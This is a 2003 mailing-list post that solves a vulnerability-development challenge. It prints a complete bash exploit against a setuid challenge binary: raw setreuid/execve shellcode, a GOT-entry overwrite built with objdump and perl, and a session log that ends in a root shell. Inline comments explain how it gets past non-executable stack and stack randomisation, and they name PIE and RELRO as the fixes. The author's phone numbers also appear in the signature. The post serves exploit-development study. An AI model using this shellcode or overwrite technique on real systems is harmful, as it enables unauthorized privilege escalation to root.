Re: [Vuln-dev Challenge] Challenge #2 (SPOILER)

From: Joel Eriksson (je-vulndevat_private)
Date: Fri May 23 2003 - 17:11:33 PDT


    [je@vudo ~]$ cat>expldev-2.sh<<EOF
    #!/bin/bash
    #
    # Linux/x86 exploit for vulndev-2
    # 
    # Defeats non-executable stack / heap & randomized stack base
    #
    # 2003-05-23 - Joel Eriksson (je at 0xbadc0ded.org)
    #
    # Structure: emit shellcode into a variable, read one fixed address out
    # of the target binary's relocation table, build two argv strings around
    # that address, run the binary.  Why the protections named above do not
    # stop it: nothing here depends on a stack address -- the only address
    # used comes from the binary itself (objdump -R), which stays fixed when
    # the executable is not position-independent and its relocation slots
    # remain writable.  PIE plus a read-only relocation table (RELRO) are the
    # mitigations aimed at exactly this kind of fixed-address write.
    #
    # NOTE(review): on the page this file is written with `cat ... <<EOF`
    # (unquoted delimiter), so an interactive shell would expand the $… and
    # `…` expressions while writing the file instead of storing them
    # literally; the listing presumably shows the intended file contents,
    # not the literal result of that heredoc.
    
    # x86 machine code emitted as raw bytes and captured into a shell
    # variable by command substitution.  None of the bytes below is 0x00 or
    # 0x0a, which is what makes that capture work: NUL cannot be held in a
    # bash variable and a trailing newline would be stripped.
    shellcode=`
            # setreuid(0, 0)
            printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
            # execve("/bin/sh", "/bin/sh", NULL)
            printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
            printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
    `
    
    # Layout constants measured against this particular build of the
    # challenge binary; they are not derived at runtime.
    buf_size=90     # size of buffer
    pad_size=2      # align to word boundary
    num_reps=32     # &bfp - buf may be > BFSIZE (padding/alignment)
    
    # Address of the dynamic-relocation slot (GOT entry) for printf, read
    # from the binary's own relocation table: objdump -R prints OFFSET TYPE
    # VALUE, and awk keeps the OFFSET column of the printf row.  The "0x"
    # prefix makes the hex text a literal bash arithmetic can evaluate.
    # There is no guard: if no printf relocation is found, addr is the bare
    # string "0x" and the arithmetic below fails.
    addr=0x$(objdump -R vulndev-2 | awk '$3 == "printf" { print $1 }')
    
    # argv[1]: buf_size+pad_size filler bytes, then num_reps copies of
    # (addr-2) packed as a native-endian 32-bit unsigned value (little-endian
    # on x86).  $[ ] is the old bash arithmetic form, equivalent to $(( )).
    # The shell values are spliced into the perl source by closing the
    # single-quoted string around them, so they must be plain numbers.
    arg1=$(perl -e 'print "A"x('$buf_size+$pad_size') . pack("L", '$[addr-2]')x'$num_reps)
    # argv[2]: (addr+4) packed the same way, immediately followed by the
    # shellcode.  Presumably addr-2 and addr+4 bracket printf's slot so that
    # the target's own write redirects printf into this argument -- the
    # vulnerable code is not on the page, so this is an inference; confirm
    # against the binary.
    arg2=$(perl -e 'print pack("L", '$[addr+4]')')$shellcode
    
    # Start from a clean db.log (assumed to be a file the target writes --
    # not shown on the page), then run the target with the two crafted
    # arguments.  $arg1 and $arg2 are left unquoted, so any IFS or glob
    # byte inside the packed addresses would be word-split or expanded here.
    rm -f db.log ; ./vulndev-2 $arg1 $arg2
    
    # Reports success regardless of what the target did.
    exit 0
    EOF
    [je@vudo ~]$ ./expldev-2.sh
    sh-2.05b# whoami
    root
    sh-2.05b# 
    
    -- 
    Joel Eriksson <jeat_private>
    -------------------------------------------------
    Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37
    Security Research & Systems Development at Bitnux
    PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
    A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
    -------------------------------------------------
    


